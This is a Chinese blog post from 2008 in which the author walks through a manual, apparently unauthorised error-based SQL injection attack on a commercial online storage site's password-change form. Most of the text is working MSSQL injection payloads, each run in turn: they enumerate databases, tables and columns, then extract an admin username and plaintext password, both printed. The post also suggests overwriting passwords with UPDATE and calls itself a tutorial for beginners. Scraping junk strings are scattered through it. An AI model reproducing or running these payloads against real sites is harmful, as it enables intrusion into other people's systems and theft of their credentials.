空间管理您的位置: IXPUB技术博客 » 妖界之箭欢迎您(CHINA *009) » 日志

对一个大型网络硬盘营业站点的测试

上一篇 / 下一篇 2008-08-30 00:22:17

QX1Nf*hyt0晚上，闲来无事,QQ群又吵死..无奈，于是对经常用的网络硬盘的一个网站测试,现在的注入弱点都已经封得不能再封了，没办法，不过逛来逛去，来到了一个提交表单的面前"修改密码"。
2T:jZ(P.fI0本次全为手动，没有用任何工具.
qrr2`7qr+d-`0IXPUB技术博客L4^yp[6W%z

Bp _EP8?:{0

IXPUB技术博客W"@y$B#k%KKx?Z[

在用户名中加了一个'，返回以下错误
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' AND datediff(hour,ChangeTime,getdate())<=1 AND Succeed=0' 之前有未闭合的引号。
/service/changepass.asp，行 99
nnd，原来是asp+mssql，好，要玩就玩大的.
既然用户名里可以输入，其它三个框都没有必要了，于是在本地搭建一个表单，maxlength="150" size="150"，设得长一些，好可以输入语句.

IXPUB技术博客N/cDc FVSd@

;N%@:p|!}Nn9a0

j:T+IS8dY,_ m0IXPUB技术博客uI'_*k%Md-B
首先说明，在mssql数据库中sysdatabase中是默认系统表，包含master、model、msdb、mssqlweb和empdb 5个数据库的项,dbid从1到5是系统的，分别是以上5个项,如果用户新建的话，那么dbid肯定从6开始，那么我们就试试暴出它玩玩.
rPAs'` \bl)f0在用户输入框中输入:IXPUB技术博客a4m*g"YK.fE+x2` ]
' and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) and '1'='1
r0`IxGH,zl{{ y0返回如下图所值
+^r,]8g8Y*Ewf1p+C0IXPUB技术博客 dO#W:BOE8u(K

?}#W?)Y0IXPUB技术博客~;O[s4|g8`N

N6cE|(}a7C0
fX}7G)f#G)|0好的，一个Northwind 库名暴了出来，哎~~要的不是这个，下来依次提交dbid=7,报出了如下图结果：IXPUB技术博客z:}wjq}"o"Qf
IXPUB技术博客K/[X$JV,Iav

5}qwOb.vhX0

IXPUB技术博客qPg5APnCc
HOHO
/y2upd!e*HR0这个是我所要的，因为我把dbid从6到8到试过了，后面都是返回了正常页面，而且当dbid=7的时候，这里的库名和网站的名称是一样的，所以确定为网站的库名。其中我已经把库名屏蔽，以下用xxxxxxx来表示.............IXPUB技术博客5JJ q6LF|
既然得到了库名，相应的就是要暴出他的表名。OK，依然往下提交。IXPUB技术博客T(\CL9U5P
' and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U') and '1'='1
*RP`Q3w b{T0OK，结果暴出了如下图
k(o1Te1j0I!H0

IXPUB技术博客\S5]+dt*UBg&E~

I&UbZiT0哎，得到Email_filts不是我要的，继续提交
BKS5J8k J+XS0'and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U' and name not in('Email_Filts')) and '1'='1IXPUB技术博客U jd,x`-qD
得到'ADDSize_LOG'IXPUB技术博客}$Z/E]QH,o
继续提交IXPUB技术博客+K8OgxL/Q
'and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U' and name not in('Email_Filts','ADDSize_LOG')) and '1'='1
UL0f3r u0得到'admin'，好了，得到他了，应该没有错，HOHOIXPUB技术博客x1S-[9Rzkk
得到admin这个表，下来就是要表中的值了.IXPUB技术博客4^z2X6Pz1CN"B
在用户名中提交：
&Q ps1Dr0'and 0<>(select count(*) from xxxxxxx.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) and '1'='1
iMR5TH _$AOe0IXPUB技术博客j{6jG0}[k'{

IXPUB技术博客@@ S.HSrA
IXPUB技术博客L8R2KnA,T

v0on J0m0
@2uQ%Cf ~1{0如图得到ID号:1653580929IXPUB技术博客;lQ1x a:h;[sn |
哈哈，既然有了ID号，这下还不死？？IXPUB技术博客2h:Y+g%JpOw@
现次提交：IXPUB技术博客/]-v)`}6z x ILd/d Y
'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929) and '1'='1IXPUB技术博客~ ^H'MG)V,i1K;sa
暴出adminid,不是我要的，继续：
a k*u ]0@0'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929 and name not in('adminid')) and '1'='1IXPUB技术博客P4{ Y1cN[O
暴出adminpass,继续：IXPUB技术博客DX@B ??+~9jR'U,F
'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929 and name not in('adminid','adminpass')) and '1'='1IXPUB技术博客;rpO8]|}
暴出adminuser,再继续：IXPUB技术博客#[!wh5H%Z&P'~
'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929 and name not in('adminid','adminpass','adminuser')) and '1'='1
j{4Y#u]e!A0呵呵，返回正常页面，不用了，一口气暴了3个值够了.IXPUB技术博客B-J5Sq H~6^;E)B
这下有了adminuser和adminpass，是个人都知道是什么吧，这下我们要这2个字段的值.IXPUB技术博客t};l vb
用最精典的如：user>0来暴IXPUB技术博客0B7u3l*]#?5Gwf
在用户名中输入：
`8e$\JYc)n)g0'and 0<>(select adminid from xxxxxxx.dbo.admin where adminuser>1) and '1'='1IXPUB技术博客6kW5O2`DCX
如图：
J+w!Q/TwoO}FN0IXPUB技术博客ee$y*S:_4Z

IXPUB技术博客T4ElFYs b2OR

N]sQ0wzpc0
$W A$?t9g`J0adminuser=liqianlong，啥也不说了
:]^zN)pJ5R0再输入：
1B{a gm0'and 0<>(select adminid from xxxxxxx.dbo.admin where adminuser='liqianlong' and adminpass>1) and '1'='1IXPUB技术博客Q&P8`iE
如图:
Wv |Z!_0IXPUB技术博客:p7~H)v5n8E,u\vF

IXPUB技术博客-D4S| f}!qO a
IXPUB技术博客T;ZDg4d X

2Rb"s3dUA;_-Z*X0
yLQ8x5b$|0adminpass=laoziyanhuifeiyangIXPUB技术博客$ED,Wncs\]
晕，密码:老子烟灰飞扬？？？？？牛！！！不说啥了，还不加密。如果加密了也没关系，可以用updata来修写他的密码。
~:RR HJ#oB e,E0弄了半天，一看，网页和数据库不是一个服务器，我昏，玩完，iis记录，ai....我的权限，不是让我用同网段来.......#$#$#$#%$%&^%&
6w'P5?1e or0呵呵，这是给新手一个小小手工测试方法，关键在于灵活应用.